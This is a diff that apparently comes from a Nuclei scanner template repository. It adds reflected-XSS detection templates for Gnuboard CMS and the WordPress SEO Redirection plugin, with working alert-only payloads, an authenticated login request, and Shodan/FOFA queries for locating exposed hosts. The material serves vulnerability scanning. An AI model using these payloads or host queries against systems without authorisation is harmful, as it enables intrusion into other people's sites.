+  description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
+  reference:
+    - https://sir.kr/g5_pds/4788?page=5
+    - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
+  metadata:
+    verified: true
+    shodan-query: http.html:"Gnuboard"
+  tags: xss,gnuboard
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"0nuboard<svg onload=alert(document.domain)>"'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

vulnerabilities/other/natshell-path-traversal.yaml

@@ -6,6 +6,8 @@ info:
   severity: high
   reference:
     - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
+  metadata:
+    fofa-query: title="蓝海卓越计费管理系统"
   tags: natshell,lfi
 
 requests:

vulnerabilities/other/tamronos-rce.yaml

@@ -12,7 +12,11 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10.0
     cwe-id: CWE-78
-  tags: tamronos,rce
+  metadata:
+    verified: true
+    shodan-query: title:"TamronOS IPTV系统"
+    fofa-query: title="TamronOS IPTV系统"
+tags: tamronos,rce
 
 requests:
   - method: GET

vulnerabilities/other/yonyou-u8-oa-sqli.yaml

@@ -1,12 +1,12 @@
-id: yongyou-u8-oa-sqli
+id: yonyou-u8-oa-sqli
 
 info:
-  name: Yongyou U8 OA Sqli
+  name: Yonyou U8 OA Sqli
   author: ritikchaddha
   severity: high
   reference:
     - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
-  tags: yongyou,u8,oa,sqli
+  tags: yonyou,oa,sqli
 
 requests:
   - method: GET

vulnerabilities/wordpress/seo-redirection-xss.yaml

@@ -0,0 +1,54 @@
+id: seo-redirection-xss
+
+info:
+  name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue.
+  remediation: Fixed in version 7.4.
+  reference:
+    - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea
+  tags: wordpress,xss,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E
+
+      - |
+        GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><svg/onload=alert(/XSS/)>"
+          - "settings_page_seo-redirection"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

workflows/yonyou-nc-workflow.yaml

@@ -0,0 +1,13 @@
+id: yonyou-ufida-nc-workflow
+
+info:
+  name: Yonyou Ufida NC Security Checks
+  author: Arm!tage
+  description: A simple workflow that runs all yonyou ufida nc related nuclei templates on a given target.
+
+workflows:
+  - template: technologies/fingerprinthub-web-fingerprints.yaml
+    matchers:
+      - name: yonyou-ism
+        subtemplates:
+          - tags: yonyou